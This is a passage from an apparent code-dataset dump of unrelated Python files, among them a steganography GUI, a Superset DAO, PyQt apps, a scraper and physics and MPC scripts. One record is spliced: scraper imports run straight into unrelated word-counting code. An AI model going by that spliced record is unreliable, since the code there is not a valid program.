carrier_open(self):\n self.carrier_file = filedialog.askopenfilename(initialdir = \"./\",title = \"Select carrier file\",filetypes = [(\"bmp files\",\"*.bmp\")])\n if (len(self.text_file) > 0):\n self.embed_button.config(state=NORMAL)\n self.carrier_label['text'] = self.carrier_file \n \n \n def text_open(self):\n self.text_file = filedialog.askopenfilename(initialdir = \"./\",title = \"Select text file\",filetypes = [(\"text files\",\"*.txt\")])\n if (len(self.carrier_file) > 0):\n self.embed_button.config(state=NORMAL)\n self.text_label['text'] = self.text_file \n \n \n def dirty_open(self):\n self.dirty_file = filedialog.askopenfilename(initialdir = \"./\",title = \"Select dirty file\",filetypes = [(\"bmp files\",\"*.bmp\")])\n if (len(self.dirty_file) > 0):\n self.extract_button.config(state=NORMAL)\n self.dirty_label['text'] = self.dirty_file \n \n # Exit\n def quit(self):\n self.check = 0\n self.root.quit\n \n # Stego functions\n def embed_function(self):\n self.dirty_file = \"LSBFile.bmp\"\n embed = Embedding(self.text_file, self.carrier_file, self.dirty_file)\n embed.embedding_process()\n self.extract_button.config(state=NORMAL)\n self.algo_label['text'] = \"Embedding done!\"\n self.dirty_label['text'] = self.dirty_file\n self.menubar.entryconfig(\"Analysis\", state=\"normal\")\n self.analysis = Analysis(self.carrier_file,self.dirty_file)\n \n def extract_function(self):\n extract = Extracting(self.dirty_file ,self.extracted_file)\n extract.extracting_process()\n self.algo_label['text'] = \"Extracting done!\" \n \n # Analysis\n def PSNR(self):\n psnr = self.analysis.calculate_psnr()\n self.PSNR_label['text'] = \"PSNR: \" + str(psnr)\n \n def SSIM(self):\n ssim = self.analysis.calculate_ssim()\n self.SSIM_label['text'] = \"SSIM: \" + str(ssim) \n \n\n\n \n","repo_name":"Phoetaim/Steganography","sub_path":"Assign05/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":4651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3209298082","text":"\nfrom sortedcontainers import SortedList\n\n\nclass MKAverage:\n\n def __init__(self, m: int, k: int):\n self.nums = SortedList()\n self.m = m\n self.k = k\n\n def addElement(self, num: int) -> None:\n if len(self.nums) == self.m and num > self.nums[0]:\n self.nums.pop(0)\n self.nums.add(num)\n\n def calculateMKAverage(self) -> int:\n if len(self.nums) < self.m:\n return -1\n cur = self.nums[self.k: -self.k]\n return sum(cur) // len(cur)\n\n\nif __name__ == '__main__':\n mk = MKAverage(m=3, k=1)\n mk.addElement(3)\n mk.addElement(1)\n print(mk.calculateMKAverage())\n mk.addElement(10)\n print(mk.calculateMKAverage())\n mk.addElement(5)\n mk.addElement(5)\n mk.addElement(5)\n print(mk.calculateMKAverage())\n","repo_name":"foreverxujiahuan/algorithm","sub_path":"队列/lc1825.py","file_name":"lc1825.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"529399033","text":"from util.TableParse import parse,clean as limpia\nfrom common.constants import COLLECTOR_ROOT\nfrom lib.download_files import doDownload\nimport urlparse\nfrom random import randint\ntabla =[]\nimport os\nimport logging\n\n# prevInputWordsLength:\n inputWordsOrder[word] = len(inputWords)\n for word in inputWords:\n print(word, inputWordsOrder[word])\nprint(\"Finished\")\n ","repo_name":"MTset/Python-Programming-Coursework","sub_path":"Python 01: Beginning Python/Lesson 06: Sets and Dicts/input_counter.py","file_name":"input_counter.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12360492414","text":"import sys\n\nfrom PyQt5.QtWidgets import QMainWindow, QApplication\nfrom PyQt5.QtGui import QIcon\nfrom view.login import Ui_Login_form\nfrom view.main import Ui_MainWindow\n\n\nclass MainForm(QMainWindow, Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.main_form = Ui_MainWindow()\n self.main_form.setupUi(self)\n self.setWindowIcon(QIcon('icons/page/home-page.png'))\n\n\nclass LoginForm(QMainWindow, Ui_Login_form):\n def __init__(self):\n super().__init__()\n self.login = Ui_Login_form()\n self.login.setupUi(self)\n self.setupFormUI()\n\n\n def setupFormUI(self):\n self.setWindowTitle('Login form')\n self.setWindowIcon( QIcon('icons/page/login-rounded-right.png') )\n self.login.lineEdit_login.setPlaceholderText('Enter login')\n self.login.lineEdit_password.setPlaceholderText('Enter password')\n self.login.btn_confirm.setFocus()\n self.login.btn_confirm.clicked.connect(self.confirm_pushed)\n\n\n def confirm_pushed(self):\n self.login.lbl_error.setText('Error. Wrong data')\n #login_window.close()\n self.main_window = MainForm()\n self.main_window.show()\n self.main_window.main_form.tabWidget.setTabEnabled(3,False)\n\n\n\napp = QApplication(sys.argv)\nlogin_window = LoginForm()\nlogin_window.show()\nsys.exit(app.exec_())","repo_name":"Yelesin/CourseWorkDatabase","sub_path":"tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25166162095","text":"from __future__ import annotations\n\nimport logging\nfrom typing import Any\n\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom superset.connectors.sqla.models import SqlaTable, SqlMetric, TableColumn\nfrom superset.daos.base import BaseDAO\nfrom superset.extensions import db\nfrom superset.models.core import Database\nfrom superset.models.dashboard import Dashboard\nfrom superset.models.slice import Slice\nfrom superset.utils.core import DatasourceType\nfrom superset.views.base import DatasourceFilter\n\nlogger = logging.getLogger(__name__)\n\n\nclass DatasetDAO(BaseDAO[SqlaTable]):\n base_filter = DatasourceFilter\n\n @staticmethod\n def get_database_by_id(database_id: int) -> Database | None:\n try:\n return db.session.query(Database).filter_by(id=database_id).one_or_none()\n except SQLAlchemyError as ex: # pragma: no cover\n logger.error(\"Could not get database by id: %s\", str(ex), exc_info=True)\n return None\n\n @staticmethod\n def get_related_objects(database_id: int) -> dict[str, Any]:\n charts = (\n db.session.query(Slice)\n .filter(\n Slice.datasource_id == database_id,\n Slice.datasource_type == DatasourceType.TABLE,\n )\n .all()\n )\n chart_ids = [chart.id for chart in charts]\n\n dashboards = (\n (\n db.session.query(Dashboard)\n .join(Dashboard.slices)\n .filter(Slice.id.in_(chart_ids))\n )\n .distinct()\n .all()\n )\n return {\"charts\": charts, \"dashboards\": dashboards}\n\n @staticmethod\n def validate_table_exists(\n database: Database, table_name: str, schema: str | None\n ) -> bool:\n try:\n database.get_table(table_name, schema=schema)\n return True\n except SQLAlchemyError as ex: # pragma: no cover\n logger.warning(\"Got an error %s validating table: %s\", str(ex), table_name)\n return False\n\n @staticmethod\n def validate_uniqueness(\n database_id: int,\n schema: str | None,\n name: str,\n dataset_id: int | None = None,\n ) -> bool:\n dataset_query = db.session.query(SqlaTable).filter(\n SqlaTable.table_name == name,\n SqlaTable.schema == schema,\n SqlaTable.database_id == database_id,\n )\n\n if dataset_id:\n # make sure the dataset found is different from the target (if any)\n dataset_query = dataset_query.filter(SqlaTable.id != dataset_id)\n\n return not db.session.query(dataset_query.exists()).scalar()\n\n @staticmethod\n def validate_update_uniqueness(\n database_id: int,\n schema: str | None,\n dataset_id: int,\n name: str,\n ) -> bool:\n dataset_query = db.session.query(SqlaTable).filter(\n SqlaTable.table_name == name,\n SqlaTable.database_id == database_id,\n SqlaTable.schema == schema,\n SqlaTable.id != dataset_id,\n )\n return not db.session.query(dataset_query.exists()).scalar()\n\n @staticmethod\n def validate_columns_exist(dataset_id: int, columns_ids: list[int]) -> bool:\n dataset_query = (\n db.session.query(TableColumn.id).filter(\n TableColumn.table_id == dataset_id, TableColumn.id.in_(columns_ids)\n )\n ).all()\n return len(columns_ids) == len(dataset_query)\n\n @staticmethod\n def validate_columns_uniqueness(dataset_id: int, columns_names: list[str]) -> bool:\n dataset_query = (\n db.session.query(TableColumn.id).filter(\n TableColumn.table_id == dataset_id,\n TableColumn.column_name.in_(columns_names),\n )\n ).all()\n return len(dataset_query) == 0\n\n @staticmethod\n def validate_metrics_exist(dataset_id: int, metrics_ids: list[int]) -> bool:\n dataset_query = (\n db.session.query(SqlMetric.id).filter(\n SqlMetric.table_id == dataset_id, SqlMetric.id.in_(metrics_ids)\n )\n ).all()\n return len(metrics_ids) == len(dataset_query)\n\n @staticmethod\n def validate_metrics_uniqueness(dataset_id: int, metrics_names: list[str]) -> bool:\n dataset_query = (\n db.session.query(SqlMetric.id).filter(\n SqlMetric.table_id == dataset_id,\n SqlMetric.metric_name.in_(metrics_names),\n )\n ).all()\n return len(dataset_query) == 0\n\n @classmethod\n def update(\n cls,\n item: SqlaTable | None = None,\n attributes: dict[str, Any] | None = None,\n commit: bool = True,\n ) -> SqlaTable:\n \"\"\"\n Updates a Dataset model on the metadata DB\n \"\"\"\n\n if item and attributes:\n if \"columns\" in attributes:\n cls.update_columns(\n item,\n attributes.pop(\"columns\"),\n commit=commit,\n override_columns=bool(attributes.get(\"override_columns\")),\n )\n\n if \"metrics\" in attributes:\n cls.update_metrics(item, attributes.pop(\"metrics\"), commit=commit)\n\n return super().update(item, attributes, commit=commit)\n\n @classmethod\n def update_columns(\n cls,\n model: SqlaTable,\n property_columns: list[dict[str, Any]],\n commit: bool = True,\n override_columns: bool = False,\n ) -> None:\n \"\"\"\n Creates/updates and/or deletes a list of columns, based on a\n list of Dict.\n\n - If a column Dict has an `id` property then we update.\n - If a column Dict does not have an `id` then we create a new metric.\n - If there are extra columns on the metadata db that are not defined on the List\n then we delete.\n \"\"\"\n\n if override_columns:\n db.session.query(TableColumn).filter(\n TableColumn.table_id == model.id\n ).delete(synchronize_session=\"fetch\")\n\n db.session.bulk_insert_mappings(\n TableColumn,\n [\n {**properties, \"table_id\": model.id}\n for properties in property_columns\n ],\n )\n else:\n columns_by_id = {column.id: column for column in model.columns}\n\n property_columns_by_id = {\n properties[\"id\"]: properties\n for properties in property_columns\n if \"id\" in properties\n }\n\n db.session.bulk_insert_mappings(\n TableColumn,\n [\n {**properties, \"table_id\": model.id}\n for properties in property_columns\n if not \"id\" in properties\n ],\n )\n\n db.session.bulk_update_mappings(\n TableColumn,\n [\n {**columns_by_id[properties[\"id\"]].__dict__, **properties}\n for properties in property_columns_by_id.values()\n ],\n )\n\n db.session.query(TableColumn).filter(\n TableColumn.id.in_(\n {column.id for column in model.columns}\n - property_columns_by_id.keys()\n )\n ).delete(synchronize_session=\"fetch\")\n\n if commit:\n db.session.commit()\n\n @classmethod\n def update_metrics(\n cls,\n model: SqlaTable,\n property_metrics: list[dict[str, Any]],\n commit: bool = True,\n ) -> None:\n \"\"\"\n Creates/updates and/or deletes a list of metrics, based on a\n list of Dict.\n\n - If a metric Dict has an `id` property then we update.\n - If a metric Dict does not have an `id` then we create a new metric.\n - If there are extra metrics on the metadata db that are not defined on the List\n then we delete.\n \"\"\"\n\n metrics_by_id = {metric.id: metric for metric in model.metrics}\n\n property_metrics_by_id = {\n properties[\"id\"]: properties\n for properties in property_metrics\n if \"id\" in properties\n }\n\n db.session.bulk_insert_mappings(\n SqlMetric,\n [\n {**properties, \"table_id\": model.id}\n for properties in property_metrics\n if not \"id\" in properties\n ],\n )\n\n db.session.bulk_update_mappings(\n SqlMetric,\n [\n {**metrics_by_id[properties[\"id\"]].__dict__, **properties}\n for properties in property_metrics_by_id.values()\n ],\n )\n\n db.session.query(SqlMetric).filter(\n SqlMetric.id.in_(\n {metric.id for metric in model.metrics} - property_metrics_by_id.keys()\n )\n ).delete(synchronize_session=\"fetch\")\n\n if commit:\n db.session.commit()\n\n @classmethod\n def find_dataset_column(cls, dataset_id: int, column_id: int) -> TableColumn | None:\n # We want to apply base dataset filters\n dataset = DatasetDAO.find_by_id(dataset_id)\n if not dataset:\n return None\n return (\n db.session.query(TableColumn)\n .filter(TableColumn.table_id == dataset_id, TableColumn.id == column_id)\n .one_or_none()\n )\n\n @classmethod\n def find_dataset_metric(cls, dataset_id: int, metric_id: int) -> SqlMetric | None:\n # We want to apply base dataset filters\n dataset = DatasetDAO.find_by_id(dataset_id)\n if not dataset:\n return None\n return db.session.query(SqlMetric).get(metric_id)\n\n @staticmethod\n def get_table_by_name(database_id: int, table_name: str) -> SqlaTable | None:\n return (\n db.session.query(SqlaTable)\n .filter_by(database_id=database_id, table_name=table_name)\n .one_or_none()\n )\n\n\nclass DatasetColumnDAO(BaseDAO[TableColumn]):\n pass\n\n\nclass DatasetMetricDAO(BaseDAO[SqlMetric]):\n pass\n","repo_name":"apache/superset","sub_path":"superset/daos/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":10144,"program_lang":"python","lang":"en","doc_type":"code","stars":55269,"dataset":"github-code","pt":"61"} +{"seq_id":"16623104131","text":"import cv2\nfrom joblib import load\nfrom parse import image_parse, label_parse\n\n\ndef show_webcam(mirror=False):\n clf_sgd = load(\"clf-sgd.joblib\")\n clf_lbfgs = load(\"newclf.joblib\")\n i = 0\n cam = cv2.VideoCapture(1)\n newImage = cam.read()\n while True:\n ret_val, img = cam.read()\n # img, contonours, thresh = get_img_contour_thresh(img)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n img1 = cv2.GaussianBlur(gray, (35, 35), 0)\n img12 = cv2.GaussianBlur(gray, (11, 11), 0)\n img13 = cv2.GaussianBlur(gray, (51, 51), 0)\n img2 = cv2.blur(gray, (35, 35))\n ret, thresh1 = cv2.threshold(img12, 100, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n # thresh2 = thresh1[25:25 + 450, 25:25 + 575]\n thresh2 = thresh1\n contours, hierarchy = cv2.findContours(thresh2, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n if len(contours) > 0:\n contour = max(contours, key=cv2.contourArea)\n # contour = contours[0]\n if cv2.contourArea(contour) > 1000:\n print(\"Test \" + str(i))\n i += 1\n x, y, w, h = cv2.boundingRect(contour)\n temp = adjustBox(x, y, w, h)\n x = int(temp[0])\n w = int(temp[1])\n cv2.rectangle(img, (x,y), (x+w, y+h), (200,255,200), 2)\n z = int(x + (h/2))\n newImage = thresh1[y:y + h, x:x + w]\n newImage = cv2.resize(newImage, (20,20))\n newImage = newImage / 255.0\n color = [0, 0, 0]\n newImage = cv2.copyMakeBorder(newImage, 4, 4, 4, 4, cv2.BORDER_CONSTANT, value=color)\n print(newImage)\n # newImageUpdate = newImageUpdate / 255.0\n prediction_sgd = clf_sgd.predict(newImage.reshape(1, -1))\n prediction_lbfgs = clf_lbfgs.predict(newImage.reshape(1, -1))\n cv2.putText(img, \"Prediction sgd: \" + str(prediction_sgd), (50, 375), cv2.FONT_HERSHEY_PLAIN, 3, (255, 255, 0), 2)\n cv2.putText(img, \"Prediction new: \" + str(prediction_lbfgs), (50, 450), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 255), 2)\n \n cv2.imshow('original', img)\n # cv2.imshow('original2', img)\n cv2.imshow('threshold', thresh1)\n # cv2.imshow('threhold2', thresh2)\n # cv2.imshow('test images', newImage)\n cv2.imshow('predict image', newImage)\n # cv2.imshow('test', test)\n if cv2.waitKey(1) == 27: \n break # esc to quit\n cv2.destroyAllWindows()\n\ndef adjustBox(x, y, w, h):\n totalW = 650\n totalH = 400\n\n if h > w:\n delta = h - w\n newW = w + delta\n if x > delta/2:\n newX = x - (delta/2)\n if newX + newW < totalW:\n x = newX\n w = newW\n \n return (x, w)\n\ndef main():\n show_webcam(mirror=True)\n\n\nif __name__ == '__main__':\n main()","repo_name":"Jake-Cloud/machine-learning-project","sub_path":"webcam.py","file_name":"webcam.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23533482728","text":"from fantasy_football import get_active_players, parse_game_log\nfrom database_handler import DatabaseHandler\nfrom string import ascii_uppercase\nfrom time import sleep\n\n\ndef consume(first_letter):\n player_db = DatabaseHandler()\n players = get_active_players(first_letter)\n for player in players:\n first_name = player.get('name', '').split(' ')[0]\n last_name = player.get('name', '').split(' ')[1]\n position = player.get('position')\n url = player.get('link')\n player_id = player_db.write_player(\n first_name, last_name, position, url)\n game_dict = parse_game_log(url)\n for game in game_dict:\n player_db.write_game(player_id, game)\n # Take a rest between players so pro football ref doesn't get upset\n sleep(1)\n\n\ndef get_all_active_players():\n for first_letter in ascii_uppercase:\n consume(first_letter)\n\n\ndef scrape():\n for letter in ascii_uppercase:\n consume(letter)\n","repo_name":"alexk307/nfldb","sub_path":"player_ingestion.py","file_name":"player_ingestion.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8096785923","text":"from src.entities.group import Group\nfrom src.entities.student import Student\nfrom src.services.user_service import user_service\nfrom src.tools.rankings_converter import convert_to_list\nfrom datetime import datetime\n\ndef convert_choices_groups(survey_choices):\n \"\"\"\n Converts database data into the class \"Group\", which is used in the sorting algorithm\n\n args:\n survey_choices: The list of choices for a survey\n \"\"\"\n groups = {}\n for choice in survey_choices:\n groups[choice[0]] = Group(choice[0], choice[2], choice[3])\n return groups\n\ndef convert_users_students(user_rankings):\n \"\"\"\n Converts database data into the class \"Student\", which is used in the sorting algorithm\n\n args:\n user_rankings: The list of user rankings for a survey\n \"\"\"\n students = {}\n for user_ranking in user_rankings:\n user_id = user_ranking[0]\n name = user_service.get_name(user_id)\n ranking = convert_to_list(user_ranking[1])\n int_ranking = [int(i) for i in ranking]\n int_rejections = []\n if user_ranking[2]:\n if len(user_ranking[2])>0:\n rejections = convert_to_list(user_ranking[2])\n int_rejections = [int(i) for i in rejections]\n students[user_id] = Student(user_id, name, int_ranking, int_rejections)\n return students\n\ndef get_happiness(survey_choice_id, user_ranking):\n \"\"\"\n A function for getting the ordinal number of the survey_choice which the student ended in. E.G rankings = \"2,4,5,1,3\" and they\n got chosen for 4, the function returns 2.\n\n args:\n survey_choice_id: The id of the survey choice in which the student was selected into\n user_ranking: The ranking of the user for the survey\n \"\"\"\n ranking_list = convert_to_list(user_ranking)\n happiness = 0\n for choice_id in ranking_list:\n happiness += 1\n if survey_choice_id == int(choice_id):\n break\n return happiness\n \ndef convert_date(data):\n \"\"\"\n Convert a datetime object to a dd.mm.yyyy string\n\n args:\n data: The datetime object\n \"\"\"\n day = check_if_zero_needed(str(data.day))\n month = check_if_zero_needed(str(data.month))\n year = str(data.year)\n date = day + \".\" + month + \".\" + year\n return date\n \ndef convert_time(data):\n \"\"\"\n Convert a datetime object to a hh:mm string\n\n args:\n data: The datetime object\n \"\"\"\n time_hour = check_if_zero_needed(str(data.hour))\n time_minute = check_if_zero_needed(str(data.minute))\n time = time_hour + \":\" + time_minute\n return time\n\ndef check_if_zero_needed(unit):\n \"\"\"\n Add a 0 to the start of the unit if it's length is 1.\n\n args:\n unit: hour/minute/day/month of a datetime object\n \"\"\"\n if len(unit) == 1:\n unit = \"0\"+ unit\n return unit\n","repo_name":"piryopt/pienryhmien-optimointi","sub_path":"src/tools/survey_result_helper.py","file_name":"survey_result_helper.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4304778937","text":"#!/usr/bin/python\nfrom PyQt4 import QtCore, QtGui\nimport os\n\n\nclass MainWindow(QtGui.QMainWindow):\n def __init__(self, parent=None):\n super(MainWindow, self).__init__(parent)\n\n self.setupFileMenu()\n self.setupHelpMenu()\n self.setupEditor()\n self.fname = None\n\n self.setCentralWidget(self.editor)\n self.setWindowTitle(\"QtPyEditV2\")\n\n def about(self):\n QtGui.QMessageBox.about(self, \"About Syntax Highlighter\",\n \"

The Syntax Highlighter example shows how to \" \\\n \"perform simple syntax highlighting by subclassing the \" \\\n \"QSyntaxHighlighter class and describing highlighting \" \\\n \"rules using regular expressions.

\")\n\n def newFile(self):\n self.fname = None\n self.editor.clear()\n\n def openFile(self, path=None):\n with open(\"filetype.txt\") as f:\n fmt = f.readline().strip(\"\\n\")\n if not path:\n path = QtGui.QFileDialog.getOpenFileName(self, \"Open File\",\n '', fmt)\n\n if path:\n inFile = QtCore.QFile(path)\n if inFile.open(QtCore.QFile.ReadOnly | QtCore.QFile.Text):\n text = inFile.readAll()\n\n try:\n # Python v3.\n text = str(text, encoding='ascii')\n except TypeError:\n # Python v2.\n text = str(text)\n\n self.editor.setPlainText(text)\n\n def setupEditor(self):\n font = QtGui.QFont()\n font.setFamily('Courier')\n font.setFixedPitch(True)\n font.setPointSize(10)\n\n self.editor = QtGui.QTextEdit()\n self.editor.setFont(font)\n\n self.highlighter = Highlighter(self.editor.document())\n\n def saveFile(self):\n if not self.fname:\n self.fname = QtGui.QFileDialog.getSaveFileName(self, \"Save As...\",\n '')\n with open(str(self.fname), 'w') as f:\n f.write(self.editor.toPlainText())\n #t = os.popen(\"sed -f sub.sed %s\" % self.fname).read()\n #f.seek(0)\n #f.write(t)\n \n\n def setupFileMenu(self):\n fileMenu = QtGui.QMenu(\"&File\", self)\n self.menuBar().addMenu(fileMenu)\n\n fileMenu.addAction(\"&New...\", self.newFile, \"Ctrl+N\")\n fileMenu.addAction(\"&Open...\", self.openFile, \"Ctrl+O\")\n fileMenu.addAction(\"&Save\", self.saveFile, \"Ctrl+S\")\n fileMenu.addAction(\"E&xit\", QtGui.qApp.quit, \"Ctrl+Q\")\n\n def setupHelpMenu(self):\n helpMenu = QtGui.QMenu(\"&Help\", self)\n self.menuBar().addMenu(helpMenu)\n\n helpMenu.addAction(\"&About\", self.about)\n helpMenu.addAction(\"About &Qt\", QtGui.qApp.aboutQt)\n\n\nclass Highlighter(QtGui.QSyntaxHighlighter):\n def __init__(self, parent=None):\n super(Highlighter, self).__init__(parent)\n\n keywordFormat = QtGui.QTextCharFormat()\n keywordFormat.setForeground(QtCore.Qt.darkBlue)\n keywordFormat.setFontWeight(QtGui.QFont.Bold)\n\n with open(\"keyword.txt\") as f:\n keywordPatterns = [s.strip(\"\\n\") for s in f.readlines()]\n\n self.highlightingRules = [(QtCore.QRegExp(pattern), keywordFormat)\n for pattern in keywordPatterns]\n\n classFormat = QtGui.QTextCharFormat()\n classFormat.setFontWeight(QtGui.QFont.Bold)\n classFormat.setForeground(QtCore.Qt.darkMagenta)\n self.highlightingRules.append((QtCore.QRegExp(\"\\\\bQ[A-Za-z]+\\\\b\"),\n classFormat))\n\n singleLineCommentFormat = QtGui.QTextCharFormat()\n singleLineCommentFormat.setForeground(QtCore.Qt.red)\n singleLineCommentFormat.setFontWeight(QtGui.QFont.Bold)\n self.highlightingRules.append((QtCore.QRegExp(\"#[^\\n]*\"),\n singleLineCommentFormat))\n\n self.multiLineCommentFormat = QtGui.QTextCharFormat()\n self.multiLineCommentFormat.setForeground(QtCore.Qt.red)\n self.multiLineCommentFormat.setFontWeight(QtGui.QFont.Bold)\n\n quotationFormat = QtGui.QTextCharFormat()\n quotationFormat.setForeground(QtCore.Qt.darkGreen)\n quotationFormat.setFontWeight(QtGui.QFont.Bold)\n self.highlightingRules.append((QtCore.QRegExp(\"\\\".*\\\"\"),\n quotationFormat))\n\n functionFormat = QtGui.QTextCharFormat()\n functionFormat.setFontItalic(True)\n functionFormat.setForeground(QtCore.Qt.blue)\n self.highlightingRules.append((QtCore.QRegExp(\"\\\\b[A-Za-z0-9_]+(?=\\\\()\"),\n functionFormat))\n\n self.commentStartExpression = QtCore.QRegExp(\"#\\\\*\")\n self.commentEndExpression = QtCore.QRegExp(\"\\n\")\n\n def highlightBlock(self, text):\n for pattern, format in self.highlightingRules:\n expression = QtCore.QRegExp(pattern)\n index = expression.indexIn(text)\n while index >= 0:\n length = expression.matchedLength()\n self.setFormat(index, length, format)\n index = expression.indexIn(text, index + length)\n\n self.setCurrentBlockState(0)\n\n startIndex = 0\n if self.previousBlockState() != 1:\n startIndex = self.commentStartExpression.indexIn(text)\n\n while startIndex >= 0:\n endIndex = self.commentEndExpression.indexIn(text, startIndex)\n\n if endIndex == -1:\n self.setCurrentBlockState(1)\n commentLength = len(text) - startIndex\n else:\n commentLength = endIndex - startIndex + self.commentEndExpression.matchedLength()\n\n self.setFormat(startIndex, commentLength,\n self.multiLineCommentFormat)\n startIndex = self.commentStartExpression.indexIn(text,\n startIndex + commentLength);\n\n\nif __name__ == '__main__':\n\n import sys\n\n app = QtGui.QApplication(sys.argv)\n window = MainWindow()\n window.resize(640, 512)\n window.show()\n sys.exit(app.exec_())\n\n","repo_name":"anirudhb/ma_desktop","sub_path":"scripts2/test_fixed.py","file_name":"test_fixed.py","file_ext":"py","file_size_in_byte":6039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23369470741","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom work import run_closed_loop_simulation\n\nif __name__ == \"__main__\":\n params = {\n \"M\": 7,\n \"x_last\": np.array([1.0, 0.0, 0.0]),\n \"N\": 40,\n \"Nsim\": 1000,\n \"dt\": 20 / 3600,\n \"epsilon_0\": 100.0,\n \"epsilon_rate\": 0.2,\n }\n res_reg = run_closed_loop_simulation(\n problem=\"mass_chain\",\n problem_params=params,\n rrlb=False,\n show_plot=False,\n # generate_code=False,\n # build_solver=False,\n )\n # plt.suptitle(\"Mass Chain - Regular MPC\")\n # res_rrlb = run_closed_loop_simulation(\n # problem=\"mass_chain\",\n # params=params,\n # rrlb=True,\n # show_plot=False,\n # # generate_code=False,\n # # build_solver=False,\n # )\n # plt.suptitle(\"Mass Chain - RRLB MPC\")\n print(f\"n_conv_reg: {res_reg['n_convergence']}\")\n # print(f\"n_conv_rrlb: {res_rrlb['n_convergence']}\")\n # print average runtimes\n print(\n f\"avg_time_reg: {1000*np.mean(res_reg['time_tot'])} ms, std: {1000*np.std(res_reg['time_tot'])} ms\"\n )\n # print(\n # f\"avg_time_rrlb: {1000*np.mean(res_rrlb['time_tot'])} ms, std: {1000*np.std(res_rrlb['time_tot'])} ms\"\n # )\n # plot time_tot\n plt.figure()\n plt.plot(1000 * res_reg[\"time_tot\"], label=\"regular\")\n # plt.plot(1000 * res_rrlb[\"time_tot\"], label=\"rrlb\")\n plt.legend()\n plt.ylabel(\"time [ms]\")\n plt.xlabel(\"time step\")\n plt.title(\"Runtimes\")\n\n # # plot epsilon\n # plt.figure()\n # plt.plot(res_rrlb[\"epsilon\"], label=\"rrlb\")\n # plt.legend()\n # plt.ylabel(\"$\\epsilon$\")\n # plt.xlabel(\"time step\")\n # plt.title(\"evolution barrier parameter $\\epsilon$\")\n\n # plot discrepancies\n plt.figure()\n plt.plot(res_reg[\"discrepancies\"], label=\"regular\")\n # plt.plot(res_rrlb[\"discrepancy\"], label=\"rrlb\")\n plt.legend()\n plt.ylabel(\"discrepancy\")\n plt.xlabel(\"time step\")\n plt.title(\"evolution discrepancy\")\n\n plt.show()\n","repo_name":"tudoroancea/paper_rrlb_mpc","sub_path":"tests/mass_chain_test.py","file_name":"mass_chain_test.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3336699050","text":"import numpy as np\nfrom numpy import linalg as la\nimport gmpy2\nimport matplotlib.pyplot as plt\nimport scipy.optimize as opt\n\nT = 1\n\ndef lamb() -> float:\n \"\"\"Common ratio parameter: lambda = 2\"\"\"\n return 2.0\n\n\ndef int_w():\n return np.power(lamb(), np.linspace(-1, 1, 1000))\n\n\ndef int_epsilon():\n return np.power(10, np.linspace(-2, -5, 100))\n\n\ndef zeta():\n \"\"\"\" returns offset \"\"\"\n return 0\n\n\ndef t_n(n, w):\n \"\"\"Hopping energy of eNRG parametrization: n = number of states\"\"\"\n\n return T / w * np.power(lamb(), -n - 1 / 2)\n\n\ndef normaliz(n, w):\n \"\"\"returns RG renormalization factor, equal to smallest codiagonal element\"\"\"\n return t_n(n - 2, w)\n\n\ndef dig_ham(n, k, w):\n \"\"\"Hamiltonian: n(odd) = Matrix Dimension / k = scattering potential\"\"\"\n if n % 2 == 0:\n print(\"Sorry: n must be odd\")\n exit(1)\n\n if zeta() == 0:\n ham__ = np.zeros((n + 1, n + 1))\n ham__[0][0] = k\n ham__[0][1] = ham__[1][0] = T / np.sqrt(w)\n for i in range(1, (n + 1) - 1):\n ham__[i][i + 1] = ham__[i + 1][i] = t_n(i - 1, w)\n eval_, evec__ = la.eigh(ham__)\n return eval_, evec__.T, eval_ / normaliz(n, w)\n\n else:\n \"\"\"returns Hamiltonian with offset\"\"\"\n ham__ = np.zeros((n + 1, n + 1))\n ham__[zeta()][zeta()] = k\n ham__[0][zeta()] = ham__[zeta()][0] = T\n for i in range(zeta()):\n ham__[0][i] = ham__[i][0] = 0\n for i in range(zeta(), (n + 1) - 1):\n ham__[i][i + 1] = ham__[i + 1][i] = t_n(i - (1+zeta()), w)\n eval_, evec__ = la.eigh(ham__)\n return eval_, evec__.T, eval_ / normaliz(n, w)\n\n\ndef delta(n, k, w):\n \"\"\"\"returns phase shift / pi associated with potential scattering k\"\"\"\n ene0_ = dig_ham(n, 0, w)[2]\n ene_ = dig_ham(n, k, w)[2]\n nfermi3: int = int((n + 1) / 2 + 3)\n ret = np.log(ene_[nfermi3] / ene0_[nfermi3]) / np.log(np.power(lamb(), 2.0))\n\n return ret\n\n\ndef xps_proj(n, k, w, hole, head):\n \"\"\"Determinant of a projection of the final state over the initial: n = number of electrons in the conduction band\n hole = hole state below Fermi's level / head = particle state above Fermi's level / k = scattering potential\"\"\"\n nfermi = int((n + 1) / 2)\n mel = np.zeros((nfermi, nfermi))\n evali, eveci__, adm_eneri_ = dig_ham(n, 0, w)\n evalf, evecf__, adm_enerf_ = dig_ham(n, k, w)\n for bra in range(n):\n for ket in 